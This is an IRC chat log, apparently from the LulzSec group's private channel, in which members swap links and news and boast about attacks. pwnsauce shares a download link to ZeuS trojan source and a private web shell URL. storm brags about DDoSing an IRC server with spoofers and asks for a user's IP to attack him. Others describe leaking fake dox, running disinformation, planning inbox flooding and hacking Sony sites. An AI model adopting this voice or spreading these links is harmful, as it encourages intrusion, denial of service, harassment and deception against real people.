12:50:32*	trollpoll (rootgratz@HA-s5h.ho4.fu85s5.IP) has joined #pure-eliteJun 04 12:50:59*	tflow_ (bottle_of_@HA-r12.0jd.4c0nch.IP) has joined #pure-eliteJun 04 12:52:25*	tflow has quit (Ping timeout: 121 seconds)Jun 04 12:52:32*	tflow_ is now known as tflowJun 04 12:55:08neuronlol: Lets see there is a pdf,ppt,xls..hhahaJun 04 12:58:17neuronSabu.. im not seeing anything really "whoop" in thisJun 04 12:58:26sabuokJun 04 12:58:59neuron:( im the only opless guy in there *crys*Jun 04 13:03:32trollpollill be backJun 04 13:03:35*	trollpoll has quit (Quit: Leaving)Jun 04 13:03:45pwnsaucetrollpoll is... THE TERMINATOR!Jun 04 13:04:14neuronSabu: None of this can help us. This was supposed to be information to help us take down mantech butJun 04 13:04:17Topiaryneuron, we're trying to hide our numbers and shit, we don't want more people being d0x'dJun 04 13:04:28Topiaryon the other chanJun 04 13:04:30neuronTopiary: UnderstandableJun 04 13:04:46Topiarysee the nicks that are OP'd now are assuming fake personasJun 04 13:04:50Topiarybecause we leaked fake doxJun 04 13:05:02Topiarywe're diverting attention from our real nicks and AnonymousJun 04 13:06:59neuronSabu: that zip contains a useless ad dump, email address *maybe useful*, A random nasa forcasting ppt from 2009, and a DoD biometric pptJun 04 13:07:45sabuokJun 04 13:07:49sabuthanks neuronJun 04 13:07:51sabugood work brotherJun 04 13:07:54sabufuck i gotta shit so hardJun 04 13:07:55sabubrbJun 04 13:08:18neuronThats sexyJun 04 13:12:27pwnsauceZeuS source code for all! http://www.mediafire.com/?o5v9ezj7lyme85tJun 04 13:12:32pwnsauce(sharing)Jun 04 13:13:58*	tflow has quit (A TLS packet with unexpected length was received.)Jun 04 13:15:10*	Topiary has quit (Quit: Leaving)Jun 04 13:16:59neuronWow people are really throwing bitcoin to lulzsec XDJun 04 13:18:28pwnsaucehow many we got?Jun 04 13:18:29*	tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-eliteJun 04 13:18:32sabuguysJun 04 13:18:35sabuhttp://www.youtube.com/watch?v=a23T8rl1sekJun 04 13:18:36neuron26Jun 04 13:18:39sabuthese guys just contacted me privatelyJun 04 13:18:43pwnsauceaye?Jun 04 13:18:52sabuthey disrupt national nazi partiesJun 04 13:18:57sabuook at how they fight the ns88Jun 04 13:19:18tflowwhat did they say?Jun 04 13:19:55tflowlolwowJun 04 13:20:34sabududeJun 04 13:20:38sabuthey straight up fuck them nazis up hahahaJun 04 13:23:02neuronlol fuckJun 04 13:34:53stormroflJun 04 13:38:30neuronthats pretyt crazyJun 04 13:38:31neurono/ stormJun 04 13:39:35pwnsaucestorm :DJun 04 13:40:44stormyoooJun 04 13:40:59stormsup neuron pwnsauceJun 04 13:41:39pwnsaucesup :DJun 04 13:41:43pwnsaucestorm - rootkits?Jun 04 13:44:13neuronbrbJun 04 13:44:14stormyou never got it?Jun 04 13:44:19stormI gave it to neuronJun 04 13:45:17stormlmk where you want it uploadedJun 04 13:45:28stormI'd prefer a shell with scp though.Jun 04 13:45:30storm:PJun 04 13:51:32pwnsaucestorm - use whoami.cer33.com/fun/shell.phpJun 04 13:51:37pwnsauceits the web interfaceJun 04 13:51:46pwnsauceall it good for is uploading/downloading shitJun 04 13:51:49sabuhttps://pastee.org/zj3mm "not done" is the psswordJun 04 13:51:53sabutell me what you guys thinkJun 04 13:51:53pwnsauceill wget it later :)Jun 04 13:51:56sabureviving antisecJun 04 13:52:17pwnsauceSavuJun 04 13:52:20pwnsauce*SabuJun 04 13:52:24pwnsauceu dun goofedJun 04 13:52:27pwnsauceno password neededJun 04 13:52:28pwnsauce:/Jun 04 13:53:25pwnsauceor maybe im just that 1337 that it didnt ask for one...Jun 04 13:54:03stormlolJun 04 13:54:05stormyeahJun 04 13:54:06stormno passJun 04 13:54:33stormpwnsauce: i don't haz a vpn to go to such webshellsJun 04 13:54:37storm:xJun 04 13:54:48sabuoh its ok not public dont thinkJun 04 13:54:55sabustorm I can give oyu one fgtJun 04 13:55:12pwnsaucestorm - thats my priv8 webll sheJun 04 13:55:17pwnsauce*priv8 shellJun 04 13:55:18pwnsauceas inJun 04 13:55:20pwnsauceI control itJun 04 13:55:27stormoh i seeJun 04 13:58:15stormroflJun 04 13:58:19stormim dropping an efnet serverJun 04 13:58:21stormwith easeJun 04 13:58:26stormfucking funnyJun 04 13:58:32storm4 100mbps spoofersJun 04 13:58:39stormbitch is getting tore the fuck upJun 04 13:59:04pwnsaucehahahahhaahaJun 04 13:59:17stormpwnsauce: 1 secJun 04 14:00:35stormk check pmJun 04 14:18:34stormwho the fk is leonJun 04 14:19:32sabuITS MEJun 04 14:19:32sabuDICKJun 04 14:19:35stormlolJun 04 14:19:36stormop meJun 04 14:19:37storm:DJun 04 14:21:27sabuwhat nick?Jun 04 14:21:39stormvoodoo ofcJun 04 14:23:42stormlooks like bots are joiningJun 04 14:24:37*	trollpoll (trollpoll@HA-4pn.f1d.en4ulv.IP) has joined #pure-eliteJun 04 14:25:27sabustormJun 04 14:25:28neuronbackJun 04 14:25:30sabuhande dem botsJun 04 14:25:30stormyoJun 04 14:25:32stormkJun 04 14:25:34sabugave you opsJun 04 14:26:03neuronback o/Jun 04 14:27:02sabusupJun 04 14:27:05sabuhi trollpol :DJun 04 14:27:17trollpollhi broJun 04 14:27:27trollpollill be here but idle..Jun 04 14:27:56neuronSabu: whats going on latley?Jun 04 14:28:32sabuok troll &lt;3Jun 04 14:28:35sabuneuron everythings okJun 04 14:28:59neuronlulzcov = our disinformation campaign?Jun 04 14:29:54sabuwhat?Jun 04 14:29:57sabululzcov?Jun 04 14:30:03neuronthe other serverJun 04 14:30:29neuronsomeone ddos this guyJun 04 14:30:39stormi dunno what ips hes usingJun 04 14:30:49*	io (egfaby@HA-umf.f9m.2dndkn.IP) has joined #pure-eliteJun 04 14:30:54neurono/ ioJun 04 14:31:00&lt;io&gt;	heya fellow swashbucklersJun 04 14:31:10neuronhi io don't think we have ever meetJun 04 14:32:27pwnsauceio is an old "one of us" :DJun 04 14:32:33&lt;io&gt;	maybe not, maybe we did. doesnt matter :)Jun 04 14:32:43&lt;io&gt;	sec brbJun 04 14:32:44neuronOOOOJun 04 14:34:03stormlol joepie91Jun 04 14:34:10stormalways on your realnameJun 04 14:34:15joepie91don't op me kthxJun 04 14:34:16joepie91yeJun 04 14:34:16joepie91I knowJun 04 14:34:24stormI'm not opping anyoneJun 04 14:34:25storm;pJun 04 14:34:26joepie91I've been lurking on there from anonnews vps since foreverJun 04 14:34:38joepie91just decided to join there from normal client as wellJun 04 14:34:56joepie91I was joining from the anonnews vps to avoid Ryan ddosing me in a triggerhappy moodJun 04 14:35:00joepie91and indeedJun 04 14:35:02joepie91a few hours laterJun 04 14:35:08joepie91"you clever bastard, you know I can't ddos that IP"Jun 04 14:35:15joepie91(from Ryan in PM)Jun 04 14:35:50joepie91buuuut I don't think Ryan is as triggerhappy right nowJun 04 14:35:51joepie91so mehJun 04 14:36:04storm| WooF (h@LulzCo-552A80F8.hsd1.ma.comcast.net) (Network)Jun 04 14:36:04stormï¿½ ircname  : The PrezJun 04 14:36:04storm| channels : #lulzsec +##lulzsecJun 04 14:36:05stormROFLJun 04 14:36:09storm##lulzsecJun 04 14:36:12neuronlolJun 04 14:37:00joepie91SabuJun 04 14:37:06joepie91you mentioned an antifa group?Jun 04 14:40:06sabuwhat?Jun 04 14:40:11stormpftJun 04 14:40:12stormwtfJun 04 14:40:17stormJackSparrow's scriptJun 04 14:40:17stormisJun 04 14:40:18stormshitJun 04 14:40:25&lt;io&gt;	lulzJun 04 14:40:27neuronlolJun 04 14:40:30stormseriousJun 04 14:40:32stormabsolute shitJun 04 14:40:39neuronBwhaha he kicked a mod awesomeJun 04 14:40:47stormi cant get in cause kayla set +RJun 04 14:41:06&lt;io&gt;	try nowJun 04 14:41:15&lt;io&gt;	ughJun 04 14:41:18&lt;io&gt;	clones back.Jun 04 14:41:28sabusighJun 04 14:41:43stormkline themJun 04 14:42:08joepie91sabuthey disrupt national nazi partiesJun 04 14:42:08joepie91sabuook at how they fight the ns88Jun 04 14:42:08joepie91tflowwhat did they say?Jun 04 14:42:08joepie91tflowlolwowJun 04 14:42:08joepie91sabududeJun 04 14:42:08joepie91sabuthey straight up fuck them nazis up hahahaJun 04 14:43:17sabuyeah joepieJun 04 14:43:18loli didn't set +R :sJun 04 14:43:20sabuthat guyJun 04 14:43:25stormget me ops back XDJun 04 14:43:26sabupart of anti-ns88 movementJun 04 14:43:34sabuthey got a big anarchy groupJun 04 14:43:37sabuthat fights nazisJun 04 14:43:56joepie91do they have a name?Jun 04 14:44:00joepie91likeJun 04 14:44:01joepie91group nameJun 04 14:44:15joepie91I might be able to ask around a bit and figure out if anyone knows anyting about them and/or their reputationJun 04 14:44:35&lt;io&gt;	&lt;ryan&gt;  /msg botserv badwords #lulzsec add irc.hardchats.comJun 04 14:44:35&lt;io&gt;	&gt;botserv&lt; badwords #lulzsec add irc.hardchats.comJun 04 14:44:35&lt;io&gt;	-BotServ- irc.hardchats.com added to #lulzsec bad words list.Jun 04 14:44:35&lt;io&gt;	&lt;buccaneer&gt; done, thxJun 04 14:44:35&lt;io&gt;	&lt;ryan&gt; i turned dontkickops on too so voodoo wont get kicked againJun 04 14:45:33stormthanksJun 04 14:45:36storm:DJun 04 14:45:47saburyan doesnt know any of you are involvedJun 04 14:45:48stormit won't work till I'm opped though &gt;;xJun 04 14:46:09*	tflow has quit (A TLS packet with unexpected length was received.)Jun 04 14:46:32*	tflow (bottle_of_@HA-r12.0jd.4c0nch.IP) has joined #pure-eliteJun 04 14:47:18&lt;io&gt;	Sabu, didn't talk to him any further and won't.Jun 04 14:47:54stormwe need a v6 serverJun 04 14:47:57stormfoshoJun 04 14:48:20storm| WooF (h@LulzCo-552A80F8.hsd1.ma.comcast.net) (Network)Jun 04 14:48:25stormsomeone gimme his ipJun 04 14:48:26stormlmaoJun 04 14:48:33stormill piss him off by taking his nickJun 04 14:53:44*	Topiary (t@HA-iag.hpg.3uomjh.IP) has joined #pure-eliteJun 04 14:53:55neuronbrbJun 04 14:53:57*	neuron has quit (Quit: leaving)Jun 04 14:56:45stormanyone?Jun 04 14:57:41joepie91ehJun 04 14:57:44joepie91how should we give his IP?Jun 04 14:58:32stormopersJun 04 14:58:36stormshould see ipsJun 04 14:58:50*	neuron (neuron@HA-cm6.345.a84vd3.IP) has joined #pure-eliteJun 04 14:58:59neuronback o/Jun 04 15:01:13joepie91who... are an oper on ED IRC?Jun 04 15:03:17joepie91also, Topiary: http://twitter.com/#!/AnotherBrony/status/77049413146648577Jun 04 15:10:00lolplease guys, dont open anything these people on #lulzsec give you, more than likely it has a 0day in it to own youJun 04 15:10:08lolthese people are giving you things for a reasonJun 04 15:10:58neuronAye :p like that rar i got containing.. a .xls , .ppt, .doc, pdf...Jun 04 15:11:00neuronXDJun 04 15:11:13neuronall useless infoJun 04 15:11:35stormlol.Jun 04 15:11:59lolneuron did you open it on a VM?Jun 04 15:12:36stormgtg guysJun 04 15:12:38stormill bblJun 04 15:12:42lolbye storm &lt;3 :)Jun 04 15:12:43stormsomeone gimme woofs ipJun 04 15:12:43joepie91http://jadedsecurity.net/2011/06/04/who-is-to-blame-for-the-success-of-the-latest-round-of-attacks/Jun 04 15:12:45storm&lt;3 :DJun 04 15:13:09joepie91also, best way is still to have a completely isolated machineJun 04 15:13:17joepie91with the actual network cable unpluggedJun 04 15:13:23joepie91to open your shit onJun 04 15:13:28joepie91can't break out of a physical machine :DJun 04 15:14:02neuronvm :P cause you can nuke itJun 04 15:18:09joepie91vm inside physical machineJun 04 15:18:16joepie91reinstall OS on physical machineJun 04 15:18:24joepie91to "nuke" it :PJun 04 15:18:33joepie91anyhow, read that articleJun 04 15:22:43joepie91"Slashdot has so many gurus meditating, the entire damn datacenter had better be levitating a mile off the ground."Jun 04 15:33:40neuron\o/ we have a $10,000 Bounty http://www.youtube.com/watch?v=RcsJW7Ah-HoJun 04 15:34:00neuronApperently im a piece of crap... XDJun 04 15:34:19pwnsauce:DJun 04 15:34:22pwnsauceLOLJun 04 15:34:29neuronwatch it lolJun 04 15:34:34neuronwe should flood his inbox for the lulzJun 04 15:36:03pwnsaucewill doJun 04 15:36:09pwnsauceonce I free soe band widthJun 04 15:36:13neuron:DJun 04 15:36:14pwnsauceyou know what my connections likeJun 04 15:36:21neuronlol you can use my shell :PJun 04 15:36:51joepie91lol he madJun 04 15:36:58joepie91he so madJun 04 15:37:18neuronSabu: Watch that videoJun 04 15:37:47sabuI didJun 04 15:38:22pwnsaucelulzJun 04 15:38:56joepie91lol just wowJun 04 15:39:09joepie91sony fanboys putting a bounty on lulzsec...Jun 04 15:39:11neuronlol How many voice interview was Topiary involved in :p every time i watch a new interview its tops voice hahaJun 04 15:39:57Topiaryblame Westboro Batshit ChurchJun 04 15:40:23neuronhttp://www.youtube.com/watch?v=0UmdcNqZmw8 &lt;&lt;Jun 04 15:42:12joepie91did kevin mitnickJun 04 15:42:13joepie91just tweetJun 04 15:42:15Topiarymy shit was about to get raped so hard via DDoS and I didn't want to spend 3 minutes getting back in, so I quickly switched VPNsJun 04 15:42:16joepie91the doxJun 04 15:42:18Topiary@ that interviewJun 04 15:42:24tflowyesJun 04 15:42:27tflowhe's a toolJun 04 15:42:27joepie91lol.Jun 04 15:42:43tflowi can't believe they would believe an fbi-informant would hack the biJun 04 15:42:45tflowfbi*Jun 04 15:42:47neuronlol Topiary how many interviews did you do :P i like to hear them question youJun 04 15:42:59Topiaryjust that one and the other one reallyJun 04 15:43:12joepie91also what is lulzsec.netJun 04 15:43:51tflowno idea, it looks like ryan's doingJun 04 15:43:53*	neuron clapsJun 04 15:44:09tflowhe also registered lulzsec.orgJun 04 15:45:52neuronlol this is the first time i saw the leaked doxJun 04 15:46:22Topiarykayla and I wrote itJun 04 15:46:24Topiarypretty good huhJun 04 15:46:57neuronYeah i like them. Kevin mitnick retwitt makes it even betterJun 04 15:47:28&lt;io&gt;	oh they're from us? thought someone was really that moronic hehJun 04 15:48:00*	joepie91 checks whois for lulzsec.org/netJun 04 15:53:18tflowbut yeahJun 04 15:53:26tflowno way i#m trusting ryan with any domainJun 04 15:53:31tflowafter what he did to anonopsJun 04 15:53:35tflowdomainsJun 04 15:53:35pwnsauceayeJun 04 15:56:09neuronwhat did he do? *i was never in the anonops loop*Jun 04 15:56:28joepie91jacked anonops domainsJun 04 15:56:32joepie91ddosed the networkJun 04 15:56:36joepie91basically hostile takeoverJun 04 15:56:41joepie91followed by trying to fuck it upJun 04 15:56:53joepie91but on another note, I should write a fucking script that allows everyone "10 PM credits a day"Jun 04 15:56:57joepie91every time you send me a PM you lose oneJun 04 15:57:00joepie91after 10 PMs you get ignoredJun 04 15:57:07neuronlmfaoJun 04 15:57:11joepie91maybe that fixes the people typing 1 word per line in PMJun 04 15:57:22joepie91and people that start complete random offtopic conversations while uploading a press releaseJun 04 15:57:24joepie91and I'm likeJun 04 15:57:25joepie91DUDEJun 04 15:57:27joepie91SHUT UPJun 04 15:57:30joepie91I AM TRYING TO GET WORK DONEJun 04 15:57:44joepie91like, just ask your question or state your problem, wait for me to answer, cut all the bullshit and get to the pointJun 04 15:57:45joepie91-_-Jun 04 15:58:58tflowhttps://support.cloudflare.com/discussions/general-chit-chat/37-cloudflare-protect-bad-guys-websitesJun 04 15:59:02tflowcheck that outJun 04 15:59:02tflowroflJun 04 16:00:06neuronthats awesomeJun 04 16:00:33tflow'CloudFlare does not censor content online, but we do comply with law enforcement agencies as appropriate.'Jun 04 16:00:40tflowi guess that means handing over ips and stuffJun 04 16:00:44tflowi'm ok with thatJun 04 16:01:00tflowthey can arrest some random brazilian guy with a unsecured routerJun 04 16:01:05tflowan*Jun 04 16:01:06&lt;io&gt;	:DJun 04 16:01:18pwnsauce:DJun 04 16:01:21pwnsauceLOL :DJun 04 16:01:58sabulololJun 04 16:02:46joepie912 Posted by KillerKoala on June 03, 2011 @ 07:22 PMJun 04 16:02:47joepie91You should contact CloudFlare's support team and complain.Jun 04 16:02:48joepie91..Jun 04 16:02:58*	joepie91 gets annoyed by moralfags who are too lazy and/or not have balls to do something themselvesJun 04 16:04:58joepie91also, lolJun 04 16:05:00joepie91cloudflare is really likeJun 04 16:05:04joepie91"ye well, idgaf"Jun 04 16:06:24tflowhttp://attrition.org/security/rants/sony_aka_sownage.htmlJun 04 16:06:24tflowhttp://attrition.org/security/rants/sony_aka_sownage.htmlJun 04 16:06:25tflowhttp://attrition.org/security/rants/sony_aka_sownage.htmlJun 04 16:07:15pwnsauceattrition &lt;3Jun 04 16:07:27joepie91my god. how can people fail to do something as fucking simple as uploading a press releaseJun 04 16:07:28joepie91likeJun 04 16:07:30joepie91there is a few peopleJun 04 16:07:35joepie91that magically have some sort of problemJun 04 16:07:37joepie91when adding PRsJun 04 16:07:39joepie91EVERY timeJun 04 16:07:56&lt;io&gt;	"If anyone... ANYONE at all uses the term "advanced persistent threat" in describing the attacks on Sony, please hit them very hard before disregarding them as ignorant charlatans hell-bent on serving their own interests."Jun 04 16:07:57&lt;io&gt;	hahahaJun 04 16:08:11joepie91also, http://pastebin.com/aXLkmNmRJun 04 16:08:22neuronHey guys don't you like our recent advanced persisten attacks on sony ;DJun 04 16:08:53tflowyeah, i saw joepie91, we rt'd itJun 04 16:09:02tflow"I was Bored and I play the game of the year : "hacker vs Sony""Jun 04 16:09:04tflowhilariousJun 04 16:10:49&lt;io&gt;	yah hahaJun 04 16:11:17&lt;io&gt;	by the timeline score is 2:2 between idahc and lulzsec :pJun 04 16:11:18tflowcertainly is the best game i've played this yearJun 04 16:12:30joepie91lolJun 04 16:12:32joepie91yaJun 04 16:12:36Topiarygame of the year all yearsJun 04 16:12:49lolnah we done 3 or 4 :DJun 04 16:12:58joepie91likeJun 04 16:12:59joepie91honestlyJun 04 16:13:00&lt;io&gt;	yah iu thought here was some stuff missingJun 04 16:13:03joepie91it would be best for sonyJun 04 16:13:03&lt;io&gt;	beneluxJun 04 16:13:03lolsonypics, sonyjp, sonybmg and anotherJun 04 16:13:06joepie91to just ditch the entire companyJun 04 16:13:10joepie91all their web servicesJun 04 16:13:12joepie91everythingJun 04 16:13:16joepie91and just start over from scratchJun 04 16:13:17joepie91lolJun 04 16:13:19&lt;io&gt;	working on that, sir.Jun 04 16:13:31&lt;io&gt;	maybe we could do that for them?Jun 04 16:13:37joepie91lololJun 04 16:15:34*	storm has quit (Ping timeout: 121 seconds)Jun 04 16:19:47joepie91my godJun 04 16:19:52joepie91I'm going to fucking disallow JPG uploadsJun 04 16:19:53joepie91on anonnewsJun 04 16:19:59joepie91"yeah but I thought JPG was the best format!"Jun 04 16:20:00neuronlol whyJun 04 16:20:04joepie91becauseJun 04 16:20:05joepie91all these PRsJun 04 16:20:07joepie91are textJun 04 16:20:08joepie91or vectorJun 04 16:20:13joepie91and are fucking full of artifactsJun 04 16:20:17joepie91every time someone submits a jpgJun 04 16:20:21trollpollnice recopilation of sony hacksJun 04 16:20:27trollpollbtw hiJun 04 16:20:36joepie91like, honestlyJun 04 16:20:38joepie91just fucking use PNGJun 04 16:20:44joepie91it's incredibly small for text and vectorJun 04 16:20:47joepie91with no quality lossJun 04 16:20:49joepie91also, hai trollpollJun 04 16:21:29trollpolllolsonypics, sonyjp, sonybmg and anotherJun 04 16:21:35trollpollthat another is like voldermortJun 04 16:21:41trollpollnoone wants to name...Jun 04 16:21:44joepie91sony*Jun 04 16:22:55trollpollso.. whats up sirs?Jun 04 16:23:23joepie91lulzJun 04 16:23:26joepie91mainlyJun 04 16:23:28neuronlolJun 04 16:23:36neurontrollpoll: we have a 10k bounty on our heads :)Jun 04 16:23:51trollpollwtf?Jun 04 16:24:09&lt;io&gt;	once we hit 10 million, i consider turning myself in.Jun 04 16:24:28trollpollwho?Jun 04 16:24:31trollpollfbi?Jun 04 16:24:34&lt;io&gt;	some sony fanboyJun 04 16:24:37&lt;io&gt;	nah lolJun 04 16:24:39trollpollbahJun 04 16:24:42&lt;io&gt;	trollZ obviouslyJun 04 16:24:49neuronhttp://www.youtube.com/watch?v=RcsJW7Ah-HoJun 04 16:24:54joepie91lesighJun 04 16:24:56joepie91http://blitz.uservoice.com/forums/107109-feedback/suggestions/1897759-play-nice-with-cloudflareJun 04 16:24:59*	storm (foolish@HA-n2d.mb1.tkrenp.IP) has joined #pure-eliteJun 04 16:25:10neuronlol i say we flood his email with dongs and nyan nyan catJun 04 16:25:10joepie91in the category of stupid proposals of the dayJun 04 16:25:10trollpolli use links2 ... i can see youtube nowJun 04 16:25:18*	pwnsauce (pwnsauce@HA-l80.7te.pn6gun.IP) has left #pure-eliteJun 04 16:25:21joepie91blitzJun 04 16:25:22joepie91pbreit, All requests made by blitz have the X-Powered-By: blitz.io header. Maybe you can talk to the CloudFlare team to see if they use this to ignore the hits and not throttle. You can read more about our automatic headers at: http://docs.blitz.io/sprinting/basicsJun 04 16:25:53trollpollhacking from an amd of more or less 10 years...Jun 04 16:27:52joepie91trollpollJun 04 16:27:56joepie91specs?Jun 04 16:28:32*	pwnsauce (pwnsauce@HA-l80.7te.pn6gun.IP) has joined #pure-eliteJun 04 16:30:44trollpollshit, im trying to copy paste an d i can... lolJun 04 16:30:44trollpollxDDDJun 04 16:30:57pwnsauceLOLJun 04 16:31:05trollpollAMD-K6(tm)-III ProcessorJun 04 16:31:13trollpollMhz 551Jun 04 16:31:20pwnsauceI have to hack into my own server cos my sister changed the root password againJun 04 16:31:51trollpolllolJun 04 16:32:06trollpolli won this laptop in a hacking challengeJun 04 16:32:08neuronphysical access makes it much easierJun 04 16:32:18trollpollwell... the rest of the ppl doesnt consider a hacking challengeJun 04 16:32:27pwnsauceI have physical, but I want to remote itJun 04 16:32:28trollpollthey just challenge...Jun 04 16:32:33neuronshould we push some of our funds to buy trollpoll a new laptop?Jun 04 16:32:39trollpolllolJun 04 16:32:47trollpolli have 3Jun 04 16:32:59pwnsauce:DJun 04 16:33:04trollpollbut, all in use XDDJun 04 16:33:18trollpollso, i have tor, i have python...Jun 04 16:33:24trollpolli can use links2 with tor...Jun 04 16:33:28trollpollwhat more?Jun 04 16:33:41pwnsauce:DJun 04 16:35:31neuronlolJun 04 16:35:33neurontrollpoll: vpn man :(Jun 04 16:35:51trollpollsureJun 04 16:36:04neuronwhat are we going to call it?Jun 04 16:36:27stormbackJun 04 16:36:30trollpolli have to improve my skills on anonymate :)Jun 04 16:36:42joepie91just stresstested a server of mineJun 04 16:36:43joepie91it did not liekJun 04 16:36:44joepie91:(Jun 04 16:36:55neurontrollpoll: do you want a vpn? :P im sure we can get you oneJun 04 16:37:10joepie91alsoJun 04 16:37:11trollpollit will be niceJun 04 16:37:17joepie91I have a pentium 3 laptopJun 04 16:37:20joepie91it has like 1,1GhZ thoughJun 04 16:37:22trollpolllolJun 04 16:37:40trollpollcan you run x on it? :DJun 04 16:37:56neuronSabu: do you have a spare vpn :E trollpoll has noneJun 04 16:38:40joepie91trollpoll: I actually run Puppy Linux with IceWMJun 04 16:38:42joepie91it runs very wellJun 04 16:38:44joepie91I can SkypeJun 04 16:38:49joepie91use Iron (aka Chromium)Jun 04 16:38:52joepie91with FlashJun 04 16:38:53trollpollvery niceJun 04 16:38:55joepie91including TinychatJun 04 16:38:56joepie91I have GeanyJun 04 16:39:03joepie91a local Hiawatha/PHP/MariaDB stackJun 04 16:39:10joepie91PMusic as media playerJun 04 16:39:15joepie91Nettalk as IRC clientJun 04 16:39:22joepie91(through WINE)Jun 04 16:39:32trollpollwowJun 04 16:39:32sabutrollpoll I will give you vpnJun 04 16:39:38joepie91hell, I can even have audio/video conversations with Skype with almost no lagginessJun 04 16:39:39joepie91:PJun 04 16:39:43*	joepie91 &lt;3 Puppy LinuxJun 04 16:39:49trollpolldid you tried to use iceweasel?Jun 04 16:39:59joepie91lolJun 04 16:40:01joepie91firefox raped itJun 04 16:40:03trollpollis a disasterJun 04 16:40:07trollpollxDDJun 04 16:40:13joepie91there's a reason I use chromium-based browsersJun 04 16:40:13joepie91lolJun 04 16:40:23trollpollthank you SabuJun 04 16:40:23joepie91Firefox like, lagged it to death with 3 tabs openJun 04 16:40:29joepie91in Iron I often have like 25 tabs openJun 04 16:40:38joepie91and I never get above 80% of my RAMJun 04 16:40:42trollpoll3 tabs... you are privileged xDDDJun 04 16:40:46joepie91total RAM in that box is 384MB RAMJun 04 16:40:59trollpollif i start iceweasel, i cant do anything elseJun 04 16:41:33joepie91so basically I am using at most 80% of my 384MB RAMJun 04 16:41:33joepie91and that includes the OS itself, Iron/Chromium + Tinychat (flash video chat), Skype, Geany, local webserver stack with php/mysql, Streaming musicJun 04 16:41:40joepie91beat that. :DJun 04 16:41:47trollpollthats the ram for!Jun 04 16:41:54joepie91my CPU is the bottleneckJun 04 16:41:57joepie91Flash tends to fuck it upJun 04 16:42:01joepie91and go 28.5 load avgJun 04 16:42:02trollpollif you dont use, you ar wasting!Jun 04 16:42:03joepie91out of nowhereJun 04 16:42:09joepie91I'm not even kiddingJun 04 16:42:13joepie91it literally goes up to 28.5Jun 04 16:45:08joepie91so waitJun 04 16:45:20joepie91you guys are claiming that lulzsec is a CIA opJun 04 16:45:30trollpollsureJun 04 16:45:31joepie91that Anonymous is working to uncover LulzSecJun 04 16:45:35trollpolldont you think is cool?Jun 04 16:45:36joepie91that Adrian Lamo is at the head of it allJun 04 16:45:41joepie91and people actually BELIEVE this shit?Jun 04 16:45:46trollpollhahahahaJun 04 16:45:50joepie91like, seriouslyJun 04 16:45:51joepie91:|Jun 04 16:45:55trollpollcounter information is usually better than informationJun 04 16:46:06trollpollas i was talking beforeJun 04 16:46:20trollpollmake the ppl think lulzsec is CIA groupJun 04 16:46:24trollpollmakes sense even for meJun 04 16:46:52Topiarywe're not claiming anything joepie, we're letting other people think thingsJun 04 16:47:02Topiarythey are stupidJun 04 16:47:06Topiaryreal stupidJun 04 16:47:11trollpollbtw, what channels are u using?Jun 04 16:47:17trollpoll4chan? forums? chats?Jun 04 16:47:19[redacted]its called mis-informationJun 04 16:47:20[redacted]:]Jun 04 16:47:23Topiarytwitter.com/lulzsecJun 04 16:47:24[redacted]not counter informationJun 04 16:47:29trollpolllolJun 04 16:47:53trollpollsaying something like... "cmon, stop asking us, we are not CIA op"Jun 04 16:48:02trollpollis the best way to make the ppl think we are..Jun 04 16:49:27neurondo people think anonymous is after us?Jun 04 16:49:42trollpolli think so, but storm doesnt :PJun 04 16:50:52stormwho has operator statusJun 04 16:50:56stormto see ipsJun 04 16:51:23pwnsaucestorm wants to packet xDJun 04 16:51:27stormyupJun 04 16:51:28storm:DJun 04 16:52:12Topiarydon't worry about Anon being after you fine folksJun 04 16:52:20Topiarythey have no idea about anyone outside of their own circlejerkJun 04 16:52:25neuron:p im not worriedJun 04 16:52:36joepie91o_OJun 04 16:52:38joepie91avastJun 04 16:52:40joepie91now has a sandboxJun 04 16:52:41neuronlol what are thye gonna do launch there loic canons my wayJun 04 16:52:47joepie91as in, actual sandboxJun 04 16:53:05*	joepie91 thinks that's the first free antivirus with a sandbox featureJun 04 16:56:17trollpolljoepie91, any console app for twitter? xDJun 04 16:56:43trollpollive downloaded the python api but i feel that is excesive to make my own client just for loling that night...Jun 04 16:56:58joepie91http://www.mactricksandtips.com/2009/01/tweeting-to-twitter-from-terminal.htmlJun 04 16:57:00neuronnaw lol worth it :PJun 04 16:57:16trollpolltnxJun 04 16:57:35*	joepie91 GONNA BE GOOGLE-FU FIGHTINGGGJun 04 16:57:58neuronTHOSE PACKETS WERE FAST AS LIGHTNINGJun 04 16:58:12neuronTHE QUERYS WERE A LITTLE BIT FRIGHTING...Jun 04 16:58:28trollpollhmm, is not a client, but.. it will workJun 04 16:58:59pwnsauceSacre Bleu! Those SYN and ACK!Jun 04 16:59:11joepie91mkJun 04 16:59:14joepie91inb4 I disconnectJun 04 17:00:21trollpolldamn, ctr+v in links2 paste... crtl+c closes...Jun 04 17:00:35trollpollfuuuuuuJun 04 17:00:47pwnsaucectrl SHIFT cJun 04 17:01:24trollpolllate... but thanks!xDJun 04 17:01:52loldo not trust this swanJun 04 17:02:20joepie91soJun 04 17:02:24joepie91the HMA clientJun 04 17:02:26joepie91is practicallyJun 04 17:02:28joepie91crashing my systemJun 04 17:02:28trollpollÂ¬Â¬Jun 04 17:02:30joepie91\o/Jun 04 17:02:44neuronlmfao joepie91 it just calls openvpnJun 04 17:03:08joepie91ya idkJun 04 17:03:11joepie91tell that to the clientJun 04 17:03:49joepie914-6-2011 23:03:30  : SENT CONTROL [server]: 'PUSH_REQUEST' (status=1)Jun 04 17:03:50joepie91after thisJun 04 17:03:54joepie91it just starts using an entire CPU coreJun 04 17:03:58joepie91crash shitJun 04 17:04:01joepie91use more and more memoryJun 04 17:04:04joepie91and not connect to the VPNJun 04 17:04:28neurondoJun 04 17:04:33neuron./hma "Spain, Madrid"Jun 04 17:04:39joepie91whatJun 04 17:04:42joepie91I'm on windows atm -_-Jun 04 17:04:48neuronlmfao that explains it :PJun 04 17:04:57joepie91eh.Jun 04 17:05:03joepie91ultravpn has never caused any issues.Jun 04 17:07:18*	tflow has quit (A TLS packet with unexpected length was received.)Jun 04 17:07:25*	joepie92 (joepie91@HA-864.t9g.4u7qps.IP) has joined #pure-eliteJun 04 17:07:29joepie92wellJun 04 17:07:33joepie92PPTP worksJun 04 17:07:37joepie92but OpenVPN, no boneJun 04 17:07:55neuronuse pptpJun 04 17:08:31joepie92mmJun 04 17:08:41pwnsaucejoepie92Jun 04 17:08:44joepie92?Jun 04 17:08:47pwnsaucehow long should mtgox takeJun 04 17:08:52pwnsauceto trnafer BTC to LRJun 04 17:08:58pwnsaucecos we transferred someJun 04 17:09:00joepie92idk, I don't 